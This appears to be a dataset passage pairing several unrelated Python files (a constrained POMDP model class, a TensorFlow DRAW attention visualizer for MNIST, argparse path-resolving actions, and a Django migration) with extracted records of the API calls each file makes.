'(self.dT)\n', (2953, 2962), False, 'from time import sleep, localtime, strftime, time\n'), ((4164, 4178), 'time.sleep', 'sleep', (['self.dT'], {}), '(self.dT)\n', (4169, 4178), False, 'from time import sleep, localtime, strftime, time\n'), ((4280, 4298), 'time.sleep', 'sleep', (['(2 * self.dT)'], {}), '(2 * self.dT)\n', (4285, 4298), False, 'from time import sleep, localtime, strftime, time\n'), ((2189, 2203), 'time.sleep', 'sleep', (['self.dT'], {}), '(self.dT)\n', (2194, 2203), False, 'from time import sleep, localtime, strftime, time\n'), ((3101, 3115), 'time.sleep', 'sleep', (['self.dT'], {}), '(self.dT)\n', (3106, 3115), False, 'from time import sleep, localtime, strftime, time\n'), ((2918, 2924), 'time.time', 'time', ([], {}), '()\n', (2922, 2924), False, 'from time import sleep, localtime, strftime, time\n'), ((4196, 4202), 'time.time', 'time', ([], {}), '()\n', (4200, 4202), False, 'from time import sleep, localtime, strftime, time\n'), ((4223, 4229), 'time.time', 'time', ([], {}), '()\n', (4227, 4229), False, 'from time import sleep, localtime, strftime, time\n')]
|
#################################################################################
# ConstrainedPlanningToolbox
# Copyright (C) 2019 Algorithmics group, Delft University of Technology
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#################################################################################
from model.BeliefPoint import BeliefPoint
class CPOMDP:
def __init__(self, num_states, num_actions, num_observations, initial_belief, num_decisions):
self.num_states = num_states
self.num_actions = num_actions
self.num_observations = num_observations
self.num_decisions = num_decisions
self.rewards_defined = False
self.has_time_dependent_reward = False
self.reward_function = None
self.time_reward_function = None
self.transitions_defined = False
self.has_time_dependent_transitions = False
self.transition_destinations = None
self.transition_probabilities = None
self.time_transition_destinations = None
self.time_transition_probabilities = None
self.cost_function_defined = False
self.cost_function = None
self.feasible_actions = None
self.init_default_feasible_actions()
self.observation_function = None
self.initial_belief = initial_belief
self.initial_state = 0
def set_reward_function(self, reward_function):
self.rewards_defined = True
self.has_time_dependent_reward = False
self.reward_function = reward_function
self.time_reward_function = None
def set_time_reward_function(self, time_reward_function):
self.rewards_defined = True
self.has_time_dependent_reward = True
self.reward_function = None
self.time_reward_function = time_reward_function
def get_reward(self, s, a):
assert not self.has_time_dependent_reward
return self.reward_function[s][a]
def get_time_reward(self, t, s, a):
if self.has_time_dependent_reward:
return self.time_reward_function[t][s][a]
else:
return self.reward_function[s][a]
def set_transitions(self, destinations, probabilities):
self.transitions_defined = True
self.has_time_dependent_transitions = False
self.transition_destinations = destinations
self.transition_probabilities = probabilities
def set_time_transitions(self, destinations, probabilities):
self.transitions_defined = True
self.has_time_dependent_transitions = True
self.time_transition_destinations = destinations
self.time_transition_probabilities = probabilities
def get_transition_destinations(self, s, a):
assert not self.has_time_dependent_transitions
return self.transition_destinations[s][a]
def get_transition_probabilities(self, s, a):
assert not self.has_time_dependent_transitions
return self.transition_probabilities[s][a]
def get_time_transition_destinations(self, t, s, a):
if self.has_time_dependent_transitions:
return self.time_transition_destinations[t][s][a]
else:
return self.transition_destinations[s][a]
def get_time_transition_probabilities(self, t, s, a):
if self.has_time_dependent_transitions:
return self.time_transition_probabilities[t][s][a]
else:
return self.transition_probabilities[s][a]
def init_default_feasible_actions(self):
self.feasible_actions = [[[] for s in range(self.num_states)] for t in range(self.num_decisions)]
for t in range(self.num_decisions):
for s in range(self.num_states):
for a in range(self.num_actions):
self.feasible_actions[t][s].append(a)
def get_feasible_actions(self, t, s):
return self.feasible_actions[t][s]
def set_feasible_actions(self, feasible_actions):
self.feasible_actions = feasible_actions
def get_cost(self, k, s, a):
assert self.cost_function_defined
return self.cost_function[k][s][a]
def get_num_domain_resources(self):
assert self.cost_function_defined
return len(self.cost_function)
def set_cost_functions(self, cost_function):
self.cost_function_defined = True
self.cost_function = cost_function
def set_observation_function(self, observation_function):
self.observation_function = observation_function
def get_observation_probability(self, a, s_next, o):
return self.observation_function[a][s_next][o]
def prepare_belief(self, belief_point):
if belief_point.has_action_observation_probs():
return
ao_probs = [[0.0 for o in range(self.num_observations)] for a in range(self.num_actions)]
for a in range(self.num_actions):
for o in range(self.num_observations):
prob = 0.0
for s in range(self.num_states):
destinations = self.get_transition_destinations(s, a)
probabilities = self.get_transition_probabilities(s, a)
for i in range(len(destinations)):
s_next = destinations[i]
s_next_prob = probabilities[i]
prob += self.get_observation_probability(a, s_next, o) * s_next_prob * belief_point.belief[s]
ao_probs[a][o] = prob
belief_point.set_action_observation_probabilities(ao_probs)
def update_belief(self, belief_point, a, o):
new_belief = [0.0 for s in range(self.num_states)]
if not belief_point.has_action_observation_probs():
self.prepare_belief(belief_point)
nc = belief_point.get_action_observation_probability(a, o)
for s in range(self.num_states):
destinations = self.get_transition_destinations(s, a)
probabilities = self.get_transition_probabilities(s, a)
for i in range(len(destinations)):
s_next = destinations[i]
s_next_prob = probabilities[i]
new_belief[s_next] += self.get_observation_probability(a, s_next, o) * s_next_prob * (1.0 / nc) * belief_point.belief[s]
return BeliefPoint(new_belief)
|
[
"model.BeliefPoint.BeliefPoint"
] |
[((6870, 6893), 'model.BeliefPoint.BeliefPoint', 'BeliefPoint', (['new_belief'], {}), '(new_belief)\n', (6881, 6893), False, 'from model.BeliefPoint import BeliefPoint\n')]
|
import warnings
warnings.filterwarnings('ignore')
import tensorflow as tf
from tensorflow.examples.tutorials import mnist
import numpy as np
import os
import random
from scipy import misc
import time
import sys
#from draw import viz_data, x, A, B, read_n, T
#from drawCopy1 import viz_data, x, A, B, read_n, T
#from draw_eric import viz_data, x, A, B, read_n, T
from draw_eric_rewrite_filterbank import viz_data, x, A, B, read_n, T
#import load_input
#import load_trace
sess_config = tf.ConfigProto()
sess_config.gpu_options.allow_growth = True
sess = tf.InteractiveSession(config=sess_config)
saver = tf.train.Saver()
#data = load_trace.TraceData()
#data.get_test(1)
#data = load_input.InputData()
#data.get_test(1)
data = mnist.input_data.read_data_sets("mnist", one_hot=True).test
def random_image():
"""Get a random image from test set."""
num_images = len(data.images)
i = random.randrange(num_images)
image_ar = np.array(data.images[i]).reshape(A, B)
return image_ar#, data.labels[i]
def load_checkpoint(it):
#path = "model_runs/blob_classification"
#saver.restore(sess, "%s/drawmodel_%d.ckpt" % (path, it))
#saver.restore(sess, "trace_draw/drawmodel.ckpt")
saver.restore(sess, "model_runs/rewrite_filterbank/drawmodel.ckpt")
# saver.restore(sess, "model_runs/rewrite_filterbank/drawmodel.ckpt")
last_image = None
def read_img(it, new_image):
batch_size = 1
out = dict()
global last_image
if new_image or last_image is None:
last_image = random_image()
#img, label = last_image
img = last_image
flipped = np.flip(img.reshape(A, B), 0)
out = {
"img": flipped,
#"label": label,
"rects": list(),
"rs": list(),
}
load_checkpoint(it)
cs = sess.run(viz_data, feed_dict={x: img.reshape(batch_size, A*B)})
for i in range(len(cs)):
print('cs[i]["stats"]: ', cs[i]["stats"])
#print(len(cs[i]["r"]))
out["rs"].append(np.flip(cs[i]["r"].reshape(read_n, read_n), 0))
out["rects"].append(stats_to_rect(cs[i]["stats"]))
return out
def read_img2(it, new_image):
"""Read image with rewritten filterbanks."""
batch_size = 1
out = dict()
global last_image
if new_image or last_image is None:
last_image = random_image()
img = last_image
flipped = np.flip(img.reshape(A, B), 0)
out = {
"img": flipped,
"dots": list(),
}
load_checkpoint(it)
cs = sess.run(viz_data, feed_dict={x: img.reshape(batch_size, A*B)})
for i in range(len(cs)):
mu_x = list(cs[i]["r_mu_x"])
mu_y = list(cs[i]["r_mu_y"])
delta = list(cs[i]["r_delta"])
gx_ = cs[i]["r_gx_"]
gy_ = cs[i]["r_gy_"]
# sigma2 = list(cs[i]["r_sigma2"])
# print("glimpse: ", i)
#
print("gx_: ")
print(gx_)
print("gy_: ")
print(gy_)
# print("sigma2: ")
# print(sigma2)
#
print("delta: ")
print(delta)
print("")
out["dots"].append(list_to_dots(mu_x, mu_y))
return out
def write_img(it, new_image):
batch_size = 1
out = dict()
global last_image
if new_image or last_image is None:
last_image = random_image()
#img, label = last_image
img = last_image
flipped = np.flip(img.reshape(A, B), 0)
out = {
#"label": label,
"rects": list(),
"c": list(),
}
load_checkpoint(it)
cs = sess.run(viz_data, feed_dict={x: img.reshape(batch_size, A*B)})
for i in range(len(cs)):
out["c"].append(np.flip(cs[i]["c"].reshape(A, B), 0))
out["rects"].append(stats_to_rect(cs[i]["w_stats"]))
#print('cs[i]["stats"]: ')
#print(cs[i]["stats"])
#print('stats_to_rect[i]["stats"]: ')
#print(stats_to_rect(cs[i]["stats"]))
return out
def write_img2(it, new_image):
"""Write image with rewritten filterbanks."""
batch_size = 1
out = dict()
global last_image
if new_image or last_image is None:
last_image = random_image()
img = last_image
flipped = np.flip(img.reshape(A, B), 0)
out = {
"img": flipped,
"dots": list(),
"c": list(),
}
load_checkpoint(it)
cs = sess.run(viz_data, feed_dict={x: img.reshape(batch_size, A*B)})
for i in range(len(cs)):
out["c"].append(np.flip(cs[i]["c"].reshape(A, B), 0))
mu_x = list(cs[i]["w_mu_x"])
mu_y = list(cs[i]["w_mu_y"])
# delta = list(cs[i]["w_delta"])
out["dots"].append(list_to_dots(mu_x, mu_y))
# gx_ = cs[i]["w_gx_"]
# gy_ = cs[i]["w_gy_"]
# sigma2 = list(cs[i]["w_sigma2"])
#
# print("glimpse: ", i)
#
# print("gx_: ")
# print(gx_)
#
# print("gy_: ")
# print(gy_)
#
# print("sigma2: ")
# print(sigma2)
#
# print("delta: ")
# print(delta)
# print("")
return out
def stats_to_rect(stats):
"""Draw attention window based on gx, gy, and delta."""
gx, gy, delta = stats
minY = A - gy + read_n/2.0 * delta
maxY = B - gy - read_n/2.0 * delta
minX = gx - read_n/2.0 * delta
maxX = gx + read_n/2.0 * delta
if minX < 1:
minX = 1
if maxY < 1:
maxY = 1
if maxX > A - 1:
maxX = A - 1
if minY > B - 1:
minY = B - 1
return dict(top=[int(minY)], bottom=[int(maxY)], left=[int(minX)], right=[int(maxX)])
def list_to_dots(mu_x, mu_y):
"""Draw filterbank based on mu_x and mu_y."""
mu_x_list = mu_x * read_n
mu_y_list = [val for val in mu_y for _ in range(0, read_n)]
return dict(mu_x_list=mu_x_list, mu_y_list=mu_y_list)
|
[
"tensorflow.train.Saver",
"warnings.filterwarnings",
"tensorflow.examples.tutorials.mnist.input_data.read_data_sets",
"tensorflow.ConfigProto",
"random.randrange",
"numpy.array",
"tensorflow.InteractiveSession"
] |
[((16, 49), 'warnings.filterwarnings', 'warnings.filterwarnings', (['"""ignore"""'], {}), "('ignore')\n", (39, 49), False, 'import warnings\n'), ((486, 502), 'tensorflow.ConfigProto', 'tf.ConfigProto', ([], {}), '()\n', (500, 502), True, 'import tensorflow as tf\n'), ((554, 595), 'tensorflow.InteractiveSession', 'tf.InteractiveSession', ([], {'config': 'sess_config'}), '(config=sess_config)\n', (575, 595), True, 'import tensorflow as tf\n'), ((605, 621), 'tensorflow.train.Saver', 'tf.train.Saver', ([], {}), '()\n', (619, 621), True, 'import tensorflow as tf\n'), ((730, 784), 'tensorflow.examples.tutorials.mnist.input_data.read_data_sets', 'mnist.input_data.read_data_sets', (['"""mnist"""'], {'one_hot': '(True)'}), "('mnist', one_hot=True)\n", (761, 784), False, 'from tensorflow.examples.tutorials import mnist\n'), ((898, 926), 'random.randrange', 'random.randrange', (['num_images'], {}), '(num_images)\n', (914, 926), False, 'import random\n'), ((942, 966), 'numpy.array', 'np.array', (['data.images[i]'], {}), '(data.images[i])\n', (950, 966), True, 'import numpy as np\n')]
|
import argparse
from pathlib import Path
from typing import Any, Optional, Sequence, Union
class FullDirPath(argparse.Action):
"""
argparse.Action subclass to resolve a path and make sure it's a directory
"""
def __call__(
self,
parse: argparse.ArgumentParser,
namespace: argparse.Namespace,
values: Union[str, Sequence[Any], None],
option_string: Optional[str] = None,
) -> None:
"""
Resolve the input path and make sure it doesn't exist (so we can make it
later), or that it's a directory.
"""
full_path = Path(str(values)).resolve()
if full_path.exists() and not full_path.is_dir():
raise argparse.ArgumentTypeError(f"{self.dest} must be a directory")
setattr(namespace, self.dest, full_path)
class FullPath(argparse.Action):
"""
argparse.Action subclass to resolve a path
"""
def __call__(
self,
parse: argparse.ArgumentParser,
namespace: argparse.Namespace,
values: Union[str, Sequence[Any], None],
option_string: Optional[str] = None,
) -> None:
"""
Resolve the input path
"""
full_path = Path(str(values)).resolve()
setattr(namespace, self.dest, full_path)
|
[
"argparse.ArgumentTypeError"
] |
[((715, 777), 'argparse.ArgumentTypeError', 'argparse.ArgumentTypeError', (['f"""{self.dest} must be a directory"""'], {}), "(f'{self.dest} must be a directory')\n", (741, 777), False, 'import argparse\n')]
|
# Generated by Django 2.0.1 on 2018-03-22 20:14
from django.db import migrations, models
import django.utils.timezone
import model_utils.fields
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Configuration',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, editable=False, verbose_name='created')),
('modified', model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, editable=False, verbose_name='modified')),
('company_logo', models.ImageField(blank=True, help_text='size should be 250pt x 100pt', null=True, upload_to='config/configuration/', verbose_name='Logo')),
('company_legal_name', models.CharField(blank=True, max_length=255, null=True, verbose_name='Legal name')),
('company_email', models.EmailField(blank=True, max_length=255, null=True, verbose_name='Email')),
('company_phone', models.CharField(blank=True, max_length=20, null=True, verbose_name='Phone')),
('company_tax_identifier', models.CharField(blank=True, max_length=20, null=True, verbose_name='Tax identifier')),
('company_address', models.CharField(blank=True, max_length=255, null=True, verbose_name='Address')),
('company_state', models.CharField(blank=True, max_length=100, null=True, verbose_name='State')),
('company_city', models.CharField(blank=True, max_length=100, null=True, verbose_name='City')),
('company_country', models.CharField(blank=True, max_length=100, null=True, verbose_name='Country')),
('company_zipcode', models.CharField(blank=True, max_length=10, null=True, verbose_name='Zipcode')),
],
options={
'abstract': False,
},
),
]
|
[
"django.db.models.ImageField",
"django.db.models.EmailField",
"django.db.models.CharField",
"django.db.models.AutoField"
] |
[((364, 457), 'django.db.models.AutoField', 'models.AutoField', ([], {'auto_created': '(True)', 'primary_key': '(True)', 'serialize': '(False)', 'verbose_name': '"""ID"""'}), "(auto_created=True, primary_key=True, serialize=False,\n verbose_name='ID')\n", (380, 457), False, 'from django.db import migrations, models\n'), ((778, 920), 'django.db.models.ImageField', 'models.ImageField', ([], {'blank': '(True)', 'help_text': '"""size should be 250pt x 100pt"""', 'null': '(True)', 'upload_to': '"""config/configuration/"""', 'verbose_name': '"""Logo"""'}), "(blank=True, help_text='size should be 250pt x 100pt',\n null=True, upload_to='config/configuration/', verbose_name='Logo')\n", (795, 920), False, 'from django.db import migrations, models\n'), ((958, 1045), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'max_length': '(255)', 'null': '(True)', 'verbose_name': '"""Legal name"""'}), "(blank=True, max_length=255, null=True, verbose_name=\n 'Legal name')\n", (974, 1045), False, 'from django.db import migrations, models\n'), ((1077, 1155), 'django.db.models.EmailField', 'models.EmailField', ([], {'blank': '(True)', 'max_length': '(255)', 'null': '(True)', 'verbose_name': '"""Email"""'}), "(blank=True, max_length=255, null=True, verbose_name='Email')\n", (1094, 1155), False, 'from django.db import migrations, models\n'), ((1192, 1268), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'max_length': '(20)', 'null': '(True)', 'verbose_name': '"""Phone"""'}), "(blank=True, max_length=20, null=True, verbose_name='Phone')\n", (1208, 1268), False, 'from django.db import migrations, models\n'), ((1314, 1404), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'max_length': '(20)', 'null': '(True)', 'verbose_name': '"""Tax identifier"""'}), "(blank=True, max_length=20, null=True, verbose_name=\n 'Tax identifier')\n", (1330, 1404), False, 'from django.db import migrations, models\n'), ((1438, 1517), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'max_length': '(255)', 'null': '(True)', 'verbose_name': '"""Address"""'}), "(blank=True, max_length=255, null=True, verbose_name='Address')\n", (1454, 1517), False, 'from django.db import migrations, models\n'), ((1554, 1631), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'max_length': '(100)', 'null': '(True)', 'verbose_name': '"""State"""'}), "(blank=True, max_length=100, null=True, verbose_name='State')\n", (1570, 1631), False, 'from django.db import migrations, models\n'), ((1667, 1743), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'max_length': '(100)', 'null': '(True)', 'verbose_name': '"""City"""'}), "(blank=True, max_length=100, null=True, verbose_name='City')\n", (1683, 1743), False, 'from django.db import migrations, models\n'), ((1782, 1861), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'max_length': '(100)', 'null': '(True)', 'verbose_name': '"""Country"""'}), "(blank=True, max_length=100, null=True, verbose_name='Country')\n", (1798, 1861), False, 'from django.db import migrations, models\n'), ((1900, 1978), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'max_length': '(10)', 'null': '(True)', 'verbose_name': '"""Zipcode"""'}), "(blank=True, max_length=10, null=True, verbose_name='Zipcode')\n", (1916, 1978), False, 'from django.db import migrations, models\n')]
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.